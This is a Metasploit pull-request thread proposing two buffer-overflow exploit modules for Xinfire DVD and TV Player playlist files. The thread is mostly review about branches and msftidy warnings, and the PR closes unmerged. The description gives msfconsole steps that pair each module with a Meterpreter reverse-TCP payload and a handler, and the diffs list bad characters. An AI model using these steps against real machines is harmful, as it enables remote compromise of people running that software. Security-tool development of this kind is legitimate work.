### PR TITLE
Added 2 exploit module exploit/windows/fileformat/

### PR DESCRIPTION
**Pull request by metacom27**
Vulnerable Application
open plf file on (playlist), and the vulnerability is triggered.

Targets
Win 7 and Win 10

Verification

use exploit/windows/fileformat/xinfire_dvd_player
set payload windows/meterpreter/reverse_tcp
set lhost (IP of Local Host)
exploit

use exploit/windows/fileformat/xinfire_tv_player
set payload windows/meterpreter/reverse_tcp
set lhost (IP of Local Host)
exploit

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost (IP of Local Host)
exploit

Video demo Buffer Overflow Xinfire DVD Player
https://youtu.be/IqTO7WNJO24

Video demo Buffer Overflow Xinfire TV Player Pro
https://youtu.be/ivBPLheOWy4

downloads software
https://download.cnet.com/Xinfire-TV-Player-Pro/3000-13632_4-75986988.html
https://download.cnet.com/Xinfire-DVD-Player-Professional/3000-13632_4-75984423.html

Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms08_067_netapi`
- [ ] ...
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

### CODE REVIEW

**Comment by bcoles** [comment]
It is required that code in your fork be merged **from a unique branch** in your repository to master in Rapid7's.  Please create a new branch in your fork of framework and resubmit this from that branch.

```
git checkout -b <BRANCH_NAME>
git push <your_fork_remote> <BRANCH_NAME>
```

This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.

Closing based on the this requirement, please do resubmit from a unique branch.

File: modules/exploits/windows/fileformat/xinfire_dvd_player.rb [hunk 1]
```diff
@@ -0,0 +1,66 @@
...
+      'Author'         =>
+        [
+          'metacom', # Vulnerability discovery  # metacom27@gmail.com - twitter.@m3tac0m
+          'metacom' # MSF Module
+        ],
+      'References'     =>
+        [
+          [ 'OSVDB', '<insert OSVDB number here>'],
+          [ 'EDB', 'insert CVE number here'],
+          [ 'EDB', '<insert another link to the exploit/advisory here>']
```
Comment (bcoles) [inline modules/exploits/windows/fileformat/xinfire_dvd_player.rb:29]: todo

File: modules/exploits/windows/fileformat/xinfire_tv_player.rb [hunk 2]
```diff
@@ -0,0 +1,66 @@
...
+      'Author'         =>
+        [
+          'metacom', # Vulnerability discovery # metacom27@gmail.com - twitter.@m3tac0m
+          'metacom' # MSF Module
+        ],
+      'References'     =>
+        [
+          [ 'OSVDB', '<insert OSVDB number here>'],
+          [ 'EDB', 'insert CVE number here'],
+          [ 'EDB', '<insert another link to the exploit/advisory here>']
```
Comment (bcoles) [inline modules/exploits/windows/fileformat/xinfire_tv_player.rb:29]: todo

File: modules/exploits/windows/fileformat/xinfire_tv_player.rb [hunk 3]
```diff
@@ -0,0 +1,66 @@
...
+      'Name'           => 'Xinfire TV Player Buffer Overflow v6.0.1.2 ',
+      'Description'    => %q{
+		This module exploits a stack-based buffer overflow on Xinfire TV Player Pro and Standard.The vulnerability is triggered when opening 
+		a malicious PLF file on Playlist.Tested successfully on Win7, Win10.This software is similar as Aviosoft Digital TV Player and BlazeVideo HDTV Player.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'metacom', # Vulnerability discovery # metacom27@gmail.com - twitter.@m3tac0m
+          'metacom' # MSF Module
```
Comment (bcoles) [inline modules/exploits/windows/fileformat/xinfire_tv_player.rb:23]:
```suggestion
          'metacom' # Discovery and Metasploit module # metacom27@gmail.com - twitter.@m3tac0m
```

File: modules/exploits/windows/fileformat/xinfire_dvd_player.rb [hunk 4]
```diff
@@ -0,0 +1,66 @@
...
+      'Name'           => 'Xinfire DVD Player Buffer Overflow v5.5.0.0',
+      'Description'    => %q{
+		This module exploits a stack-based buffer overflow on Xinfire DVD Player Pro and Standard.The vulnerability is triggered when opening 
+		a malicious PLF file on Playlist.Tested successfully on Win7, Win10.This software is similar as DVD X Player and BlazeDVD.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'metacom', # Vulnerability discovery  # metacom27@gmail.com - twitter.@m3tac0m
+          'metacom' # MSF Module
```
Comment (bcoles) [inline modules/exploits/windows/fileformat/xinfire_dvd_player.rb:23]:
```suggestion
          'metacom' # Discovery and Metasploit module # metacom27@gmail.com - twitter.@m3tac0m
```

File: modules/exploits/windows/fileformat/xinfire_tv_player.rb [hunk 5]
```diff
@@ -0,0 +1,66 @@
...
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process',
+        },
+      'Payload'        =>
+        {
+          'BadChars' => "\x00\x0a\x0d\x1a\x2f\x3a\x5c",
+          'DisableNops' => true,
+        },
```
Comment (bcoles) [inline modules/exploits/windows/fileformat/xinfire_tv_player.rb:39]:
```suggestion
      'Payload'        =>
        {
          'Space' => 1384,
          'BadChars' => "\x00\x0a\x0d\x1a\x2f\x3a\x5c",
          'DisableNops' => true,
        },
```

File: modules/exploits/windows/fileformat/xinfire_dvd_player.rb [hunk 6]
```diff
@@ -0,0 +1,66 @@
...
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process',
+        },
+      'Payload'        =>
+        {
+          'BadChars' => "\x00\x0a\x0d\x1a\x20",
+          'DisableNops' => true,
+        },
```
Comment (bcoles) [inline modules/exploits/windows/fileformat/xinfire_dvd_player.rb:39]: Add `'Space'` for available payload space.

**Review by bcoles — COMMENTED** [review]
Please resolve msftidy issues.

```
[*] Running msftidy.rb in ./.git/hooks/post-merge mode

--- Checking new and changed module syntax with tools/dev/msftidy.rb ---

modules/exploits/windows/fileformat/xinfire_dvd_player.rb - [WARNING] Invalid EDB reference

modules/exploits/windows/fileformat/xinfire_dvd_player.rb - [WARNING] Invalid EDB reference

modules/exploits/windows/fileformat/xinfire_dvd_player.rb - [INFO] No CVE references found. Please check before you land!

modules/exploits/windows/fileformat/xinfire_dvd_player.rb:16 - [WARNING] Spaces at EOL

modules/exploits/windows/fileformat/xinfire_dvd_player.rb:16 - [WARNING] Tabbed indent: "\t\tThis module exploits a stack-based buffer overflow on Xinfire DVD Player Pro and Standard.The vulnerability is triggered when opening \n"

modules/exploits/windows/fileformat/xinfire_dvd_player.rb:17 - [WARNING] Tabbed indent: "\t\ta malicious PLF file on Playlist.Tested successfully on Win7, Win10.This software is similar as DVD X Player and BlazeDVD.\n"

modules/exploits/windows/fileformat/xinfire_dvd_player.rb - [WARNING] Please add a newline at the end of the file

modules/exploits/windows/fileformat/xinfire_tv_player.rb - [WARNING] Invalid EDB reference

modules/exploits/windows/fileformat/xinfire_tv_player.rb - [WARNING] Invalid EDB reference

modules/exploits/windows/fileformat/xinfire_tv_player.rb - [INFO] No CVE references found. Please check before you land!

modules/exploits/windows/fileformat/xinfire_tv_player.rb:16 - [WARNING] Spaces at EOL

modules/exploits/windows/fileformat/xinfire_tv_player.rb:16 - [WARNING] Tabbed indent: "\t\tThis module exploits a stack-based buffer overflow on Xinfire TV Player Pro and Standard.The vulnerability is triggered when opening \n"

modules/exploits/windows/fileformat/xinfire_tv_player.rb:17 - [WARNING] Tabbed indent: "\t\ta malicious PLF file on Playlist.Tested successfully on Win7, Win10.This software is similar as Aviosoft Digital TV Player and BlazeVideo HDTV Player.\n"

modules/exploits/windows/fileformat/xinfire_tv_player.rb:42 - [WARNING] Spaces at EOL

modules/exploits/windows/fileformat/xinfire_tv_player.rb - [WARNING] Please add a newline at the end of the file

------------------------------------------------------------------------
```

**Comment by metacom27** [comment]
now is everything okay?

**Comment by bcoles** [comment]
> 
> 
> now is everything okay?

Please submit from a unique branch (not `master`).

Please also refer to the comments above regarding `msftidy` issues.

**Review by bcoles — CHANGES_REQUESTED** [review]
Please run `msftidy` on your modules and resolve any issues raised.

```
./tools/dev/msftidy.rb path/to/your/module.rb
```

Please submit from a unique branch, not master.  #11224

**Comment by metacom27** [comment]
thank you very much bcoles
 now the errors are gone

**Review by bcoles — COMMENTED** [review]
This PR is still based on the `master` branch. Please submit a new PR from a different branch.

Also, please split the two modules into two different PRs. This will help speed up testing and merging the modules.

Also, there are still a bunch of `mstfidy` issues. It looks like each line uses `\r\n` rather than `\n`.

Also, I'm not sure what changes you've made to the `shaper_pdf_bof`. It looks like the whole file has been replaced. If you want to make changes to the module, please submit this as a separate PR.

**Comment by metacom27** [comment]
I tested the modules with mstfidy and it shows me no error.

**Comment by bcoles** [comment]
> 
> 
> I tested the modules with mstfidy and it shows me no error.

I presume you've copy and pasted the file contents using the GitHub web interface.

The automated Travis CI tests failed:

https://travis-ci.org/github/rapid7/metasploit-framework/builds/676964780?utm_source=github_status&utm_medium=notification

Travis

**Comment by metacom27** [comment]
yes with GitHub web interface

I'll delete it and I'll try again

**Comment by bcoles** [comment]
#13307

**Pull request closed without merging**